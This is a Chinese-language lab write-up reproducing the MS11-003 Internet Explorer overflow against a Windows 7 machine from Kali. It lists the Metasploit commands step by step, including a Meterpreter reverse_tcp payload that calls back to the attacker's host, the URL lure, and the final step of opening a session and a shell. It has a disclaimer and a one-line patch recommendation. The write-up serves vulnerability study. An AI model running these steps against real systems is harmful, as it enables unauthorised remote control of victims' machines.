Ms11_003(Windos7 IE溢出攻击)

MS11_003(Windos7 IE溢出攻击)


免责声明:

此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。


复现环境:

Windows7(目标机,防火墙关闭)
Kali(攻击者)

复现:

1.查看Windows7 IP

ifconfig

Ms11_003(Windos7 IE溢出攻击)_第1张图片
2.使用kali看是否能ping通Windows7 IP

 ping 192.168.110.131

Ms11_003(Windos7 IE溢出攻击)_第2张图片
3.打开Metasploite漏洞库,查找ms11_003漏洞并使用

msfconsole
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import

Ms11_003(Windos7 IE溢出攻击)_第3张图片
4.查看payload

show payloads

在这里插入图片描述
5.选择使用的payload

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
6.查看Kali IP

ifconfig

Ms11_003(Windos7 IE溢出攻击)_第4张图片
7.查看options

show options 

Ms11_003(Windos7 IE溢出攻击)_第5张图片
8.配置options信息(SRVHOST、LHOST均为Kali IP、URIPATH+任意数)

set srvhost 192.168.110.132
set lhost 192.168.110.132
set uripath 0

Ms11_003(Windos7 IE溢出攻击)_第6张图片
9.开始攻击 run/exploite,会生成一个URL,复制链接使用Windows7 IE浏览器访问

run

Ms11_003(Windos7 IE溢出攻击)_第7张图片Ms11_003(Windos7 IE溢出攻击)_第8张图片
10.成功获取信息
Ms11_003(Windos7 IE溢出攻击)_第9张图片
11.查看session会话

session

在这里插入图片描述
12.选择会话连接并成功获取shell

session 1
shell

Ms11_003(Windos7 IE溢出攻击)_第10张图片

修复建议:

安装相应补丁

你可能感兴趣的:(漏洞复现)